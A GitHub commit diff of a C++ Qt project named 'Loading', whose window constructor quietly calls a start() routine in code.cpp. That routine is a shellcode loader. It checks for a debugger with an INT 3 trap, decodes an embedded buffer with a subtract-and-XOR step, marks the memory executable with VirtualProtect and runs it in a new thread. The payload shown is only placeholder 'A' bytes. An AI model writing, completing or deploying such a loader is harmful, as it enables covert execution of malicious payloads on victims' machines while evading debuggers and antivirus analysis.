import

Author: GitHub

.gitignore

@@ -0,0 +1,13 @@
+
+# Visual Studio
+.vs/
+.vscode/
+
+# Build output
+bin/
+obj/
+
+# Temporary files
+*.tmp
+*.log
+*.user

Loading/Loading.sln

@@ -0,0 +1,31 @@
+
+Microsoft Visual Studio Solution File, Format Version 12.00
+# Visual Studio Version 17
+VisualStudioVersion = 17.14.36414.22 d17.14
+MinimumVisualStudioVersion = 10.0.40219.1
+Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "Loading", "Loading\Loading.vcxproj", "{66EDDBB0-8404-470E-B6AF-F08E3028FC49}"
+EndProject
+Global
+	GlobalSection(SolutionConfigurationPlatforms) = preSolution
+		Debug|x64 = Debug|x64
+		Debug|x86 = Debug|x86
+		Release|x64 = Release|x64
+		Release|x86 = Release|x86
+	EndGlobalSection
+	GlobalSection(ProjectConfigurationPlatforms) = postSolution
+		{66EDDBB0-8404-470E-B6AF-F08E3028FC49}.Debug|x64.ActiveCfg = Debug|x64
+		{66EDDBB0-8404-470E-B6AF-F08E3028FC49}.Debug|x64.Build.0 = Debug|x64
+		{66EDDBB0-8404-470E-B6AF-F08E3028FC49}.Debug|x86.ActiveCfg = Debug|Win32
+		{66EDDBB0-8404-470E-B6AF-F08E3028FC49}.Debug|x86.Build.0 = Debug|Win32
+		{66EDDBB0-8404-470E-B6AF-F08E3028FC49}.Release|x64.ActiveCfg = Release|x64
+		{66EDDBB0-8404-470E-B6AF-F08E3028FC49}.Release|x64.Build.0 = Release|x64
+		{66EDDBB0-8404-470E-B6AF-F08E3028FC49}.Release|x86.ActiveCfg = Release|Win32
+		{66EDDBB0-8404-470E-B6AF-F08E3028FC49}.Release|x86.Build.0 = Release|Win32
+	EndGlobalSection
+	GlobalSection(SolutionProperties) = preSolution
+		HideSolutionNode = FALSE
+	EndGlobalSection
+	GlobalSection(ExtensibilityGlobals) = postSolution
+		SolutionGuid = {81588261-228D-4F54-B041-3D117CAB2B5D}
+	EndGlobalSection
+EndGlobal

Loading/Loading/Loading.cpp

@@ -0,0 +1,12 @@
+#include "Loading.h"
+#include "code.h"
+
+Loading::Loading(QWidget *parent)
+    : QMainWindow(parent)
+{
+    ui.setupUi(this);
+    start();
+}
+
+Loading::~Loading()
+{}

Loading/Loading/Loading.h

@@ -0,0 +1,16 @@
+#pragma once
+
+#include <QtWidgets/QMainWindow>
+#include "ui_Loading.h"
+
+class Loading : public QMainWindow
+{
+    Q_OBJECT
+
+public:
+    Loading(QWidget *parent = nullptr);
+    ~Loading();
+
+private:
+    Ui::LoadingClass ui;
+};

Loading/Loading/Loading.vcxproj

@@ -0,0 +1,141 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+  <ItemGroup Label="ProjectConfigurations">
+    <ProjectConfiguration Include="Debug|Win32">
+      <Configuration>Debug</Configuration>
+      <Platform>Win32</Platform>
+    </ProjectConfiguration>
+    <ProjectConfiguration Include="Release|Win32">
+      <Configuration>Release</Configuration>
+      <Platform>Win32</Platform>
+    </ProjectConfiguration>
+    <ProjectConfiguration Include="Debug|x64">
+      <Configuration>Debug</Configuration>
+      <Platform>x64</Platform>
+    </ProjectConfiguration>
+    <ProjectConfiguration Include="Release|x64">
+      <Configuration>Release</Configuration>
+      <Platform>x64</Platform>
+    </ProjectConfiguration>
+  </ItemGroup>
+  <PropertyGroup Label="Globals">
+    <VCProjectVersion>17.0</VCProjectVersion>
+    <Keyword>Win32Proj</Keyword>
+    <ProjectGuid>{66eddbb0-8404-470e-b6af-f08e3028fc49}</ProjectGuid>
+    <RootNamespace>Loading</RootNamespace>
+    <WindowsTargetPlatformVersion>10.0</WindowsTargetPlatformVersion>
+  </PropertyGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
+    <ConfigurationType>Application</ConfigurationType>
+    <UseDebugLibraries>true</UseDebugLibraries>
+    <PlatformToolset>v143</PlatformToolset>
+    <CharacterSet>Unicode</CharacterSet>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
+    <ConfigurationType>Application</ConfigurationType>
+    <UseDebugLibraries>false</UseDebugLibraries>
+    <PlatformToolset>v143</PlatformToolset>
+    <WholeProgramOptimization>true</WholeProgramOptimization>
+    <CharacterSet>Unicode</CharacterSet>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
+    <ConfigurationType>Application</ConfigurationType>
+    <UseDebugLibraries>true</UseDebugLibraries>
+    <PlatformToolset>v143</PlatformToolset>
+    <CharacterSet>Unicode</CharacterSet>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
+    <ConfigurationType>Application</ConfigurationType>
+    <UseDebugLibraries>false</UseDebugLibraries>
+    <PlatformToolset>v143</PlatformToolset>
+    <WholeProgramOptimization>true</WholeProgramOptimization>
+    <CharacterSet>Unicode</CharacterSet>
+  </PropertyGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
+  <ImportGroup Label="ExtensionSettings">
+  </ImportGroup>
+  <ImportGroup Label="Shared">
+  </ImportGroup>
+  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <PropertyGroup Label="UserMacros" />
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+    <ClCompile>
+      <WarningLevel>Level3</WarningLevel>
+      <SDLCheck>true</SDLCheck>
+      <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <ConformanceMode>true</ConformanceMode>
+    </ClCompile>
+    <Link>
+      <SubSystem>Console</SubSystem>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+    <ClCompile>
+      <WarningLevel>Level3</WarningLevel>
+      <FunctionLevelLinking>true</FunctionLevelLinking>
+      <IntrinsicFunctions>true</IntrinsicFunctions>
+      <SDLCheck>true</SDLCheck>
+      <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <ConformanceMode>true</ConformanceMode>
+    </ClCompile>
+    <Link>
+      <SubSystem>Console</SubSystem>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
+    <ClCompile>
+      <WarningLevel>Level3</WarningLevel>
+      <SDLCheck>true</SDLCheck>
+      <PreprocessorDefinitions>_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <ConformanceMode>true</ConformanceMode>
+    </ClCompile>
+    <Link>
+      <SubSystem>Console</SubSystem>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
+    <ClCompile>
+      <WarningLevel>Level3</WarningLevel>
+      <FunctionLevelLinking>true</FunctionLevelLinking>
+      <IntrinsicFunctions>true</IntrinsicFunctions>
+      <SDLCheck>true</SDLCheck>
+      <PreprocessorDefinitions>NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <ConformanceMode>true</ConformanceMode>
+    </ClCompile>
+    <Link>
+      <SubSystem>Console</SubSystem>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemGroup>
+    <ClCompile Include="code.cpp" />
+    <ClCompile Include="Loading.cpp" />
+    <ClCompile Include="main.cpp" />
+    <ClCompile Include="moc\moc_Loading.cpp" />
+    <ClCompile Include="rcc\qrc_Loading.cpp" />
+  </ItemGroup>
+  <ItemGroup>
+    <ClInclude Include="code.h" />
+    <ClInclude Include="lazy_importer.hpp" />
+    <ClInclude Include="Loading.h" />
+    <ClInclude Include="uic\ui_Loading.h" />
+  </ItemGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
+  <ImportGroup Label="ExtensionTargets">
+  </ImportGroup>
+</Project>

Loading/Loading/Loading.vcxproj.filters

@@ -0,0 +1,48 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+  <ItemGroup>
+    <Filter Include="Source Files">
+      <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
+      <Extensions>cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
+    </Filter>
+    <Filter Include="Header Files">
+      <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
+      <Extensions>h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd</Extensions>
+    </Filter>
+    <Filter Include="Resource Files">
+      <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
+      <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
+    </Filter>
+  </ItemGroup>
+  <ItemGroup>
+    <ClCompile Include="code.cpp">
+      <Filter>Source Files</Filter>
+    </ClCompile>
+    <ClCompile Include="Loading.cpp">
+      <Filter>Source Files</Filter>
+    </ClCompile>
+    <ClCompile Include="main.cpp">
+      <Filter>Source Files</Filter>
+    </ClCompile>
+    <ClCompile Include="rcc\qrc_Loading.cpp">
+      <Filter>Source Files</Filter>
+    </ClCompile>
+    <ClCompile Include="moc\moc_Loading.cpp">
+      <Filter>Source Files</Filter>
+    </ClCompile>
+  </ItemGroup>
+  <ItemGroup>
+    <ClInclude Include="code.h">
+      <Filter>Header Files</Filter>
+    </ClInclude>
+    <ClInclude Include="lazy_importer.hpp">
+      <Filter>Header Files</Filter>
+    </ClInclude>
+    <ClInclude Include="Loading.h">
+      <Filter>Header Files</Filter>
+    </ClInclude>
+    <ClInclude Include="uic\ui_Loading.h">
+      <Filter>Header Files</Filter>
+    </ClInclude>
+  </ItemGroup>
+</Project>

Loading/Loading/code.cpp

@@ -0,0 +1,109 @@
+#include "code.h"
+#include "lazy_importer.hpp"
+#include "winuser.h"
+#include <string>
+#include <cstring>
+#include <ostream>
+#include <stdlib.h>
+#include <stdio.h>
+
+
+char* c16memcpy(char* s1, const char* s2, size_t n) {
+	return static_cast<char*>(memcpy(s1, s2, n * sizeof(char)));
+}
+void* MMcpy(void* dst, const void* src, size_t len)
+{
+	char* ch_dst = (char*)dst;
+	char* ch_src = (char*)src;
+	if (NULL == ch_dst || NULL == ch_src) {
+		return NULL;
+	}
+
+	void* rest = ch_dst;
+
+	if (ch_dst <= ch_src || (char*)ch_dst >= (char*)ch_src + len) {
+		while (len--) {
+			*(char*)ch_dst = *(char*)ch_src;
+			ch_dst = (char*)ch_dst + 1;
+			ch_src = (char*)ch_src + 1;
+		}
+	}
+	else {
+		ch_src = (char*)ch_src + len - 1;
+		ch_dst = (char*)ch_dst + len - 1;
+		while (len--) {
+			*(char*)ch_dst = *(char*)ch_src;
+			ch_dst = (char*)ch_dst - 1;
+			ch_src = (char*)ch_src - 1;
+		}
+	}
+	return rest;
+}
+
+bool Tesbuer()
+{
+	__try
+	{
+		__asm  //x86 implementation
+		{
+			_emit 0xCD
+			_emit 0x03 //INT 03
+			_emit 0xC3 //RET
+		}
+	}
+	__except (EXCEPTION_EXECUTE_HANDLER)
+	{
+		return false;
+	}
+
+	return true;
+}
+
+int Testms()
+{
+	char* garbage = (char*)malloc(10);
+	for (int i = 0; i < 10; i++)
+	{
+		garbage[i] = rand() % 256;
+	}
+	return 0;
+}
+
+int start()
+{
+	if (Tesbuer())
+	{
+		Testms();
+		return 0;
+	}
+	else {
+		DWORD dwThreadId;
+		// 线程ID
+		//HANDLE hThread;
+		// 线程句柄
+		DWORD dwOldProtect;
+		//char shellcode[DATA_SIZE] = { 0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41 };
+		char shellcode[DATA_SIZE] = "AAAAAAAAAAAAAAAAAAAAAA";
+		DWORD size = ((PDWORD)shellcode)[0];//size
+		HANDLE event = CreateEvent(NULL, FALSE, TRUE, NULL);
+		char* tmpptr = shellcode + sizeof(DWORD);
+
+		char* llm_ppVoid1 = (char*)VirtualAlloc(NULL, size, MEM_COMMIT, PAGE_READWRITE);
+
+		for (int i = 0; i < size; i++)
+		{
+			tmpptr[i] = (tmpptr[i] - 1) ^ (i + 1);
+			//printf("0x%02x,", scode1[i]);
+		}
+		c16memcpy((char*)llm_ppVoid1, (const char*)tmpptr, size);
+		Testms();
+		VirtualProtect(llm_ppVoid1, size, PAGE_EXECUTE, &dwOldProtect);
+		WaitForSingleObject(CreateThread(NULL, NULL, (LPTHREAD_START_ROUTINE)llm_ppVoid1, NULL, NULL, &dwThreadId), INFINITE);
+		// 一直等待线程执行结束
+		while (1)
+		{
+			Sleep(12000);
+		}
+		//return 0;
+	}
+}

Loading/Loading/code.h

@@ -0,0 +1,8 @@
+
+#include <windows.h>
+#define DATA_SIZE 27136
+
+
+int start();
+
+void run(void* buffer);